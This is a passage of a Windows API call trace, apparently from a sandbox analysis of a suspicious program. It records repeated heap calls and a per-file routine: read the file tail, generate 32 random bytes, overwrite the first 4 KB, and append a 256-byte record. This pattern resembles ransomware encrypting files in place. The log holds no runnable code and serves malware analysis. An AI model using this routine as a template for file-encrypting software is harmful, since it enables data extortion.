[0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0079.320] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.320] WriteFile (in: hFile=0x86c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.320] WriteFile (in: hFile=0x86c, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0079.320] GetProcessHeap () returned 0x280000 [0079.320] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0079.320] CloseHandle (hObject=0x86c) returned 1 [0079.323] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 56 [0079.323] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.323] ReadFile (in: hFile=0x870, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.323] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.323] GetProcessHeap () returned 0x280000 [0079.323] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0079.323] GetProcessHeap () returned 0x280000 [0079.323] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0079.323] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0079.323] GetProcessHeap () returned 0x280000 [0079.323] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0079.323] ReadFile (in: hFile=0x870, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.920] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.921] WriteFile (in: hFile=0x870, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.922] GetProcessHeap () returned 0x280000 [0079.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.922] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.923] GetProcessHeap () returned 0x280000 [0079.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.924] GetProcessHeap () returned 0x280000 [0079.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.925] GetProcessHeap () returned 0x280000 [0079.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.926] GetProcessHeap () returned 0x280000 [0079.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0079.927] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.927] WriteFile (in: hFile=0x870, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.927] WriteFile (in: hFile=0x870, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.927] GetProcessHeap () returned 0x280000 [0079.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0079.927] GetProcessHeap () returned 0x280000 [0079.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0079.927] GetProcessHeap () returned 0x280000 [0079.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0079.927] CloseHandle (hObject=0x870) returned 1 [0079.929] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 57 [0079.930] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.930] ReadFile (in: hFile=0x874, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.930] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.930] GetProcessHeap () returned 0x280000 [0079.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0079.930] GetProcessHeap () returned 0x280000 [0079.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0079.930] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0079.930] GetProcessHeap () returned 0x280000 [0079.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0079.930] ReadFile (in: hFile=0x874, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.053] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.053] WriteFile (in: hFile=0x874, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.053] GetProcessHeap () returned 0x280000 [0080.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.053] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.054] GetProcessHeap () returned 0x280000 [0080.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.054] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0080.055] GetProcessHeap () returned 0x280000 [0080.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0080.056] GetProcessHeap () returned 0x280000 [0080.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 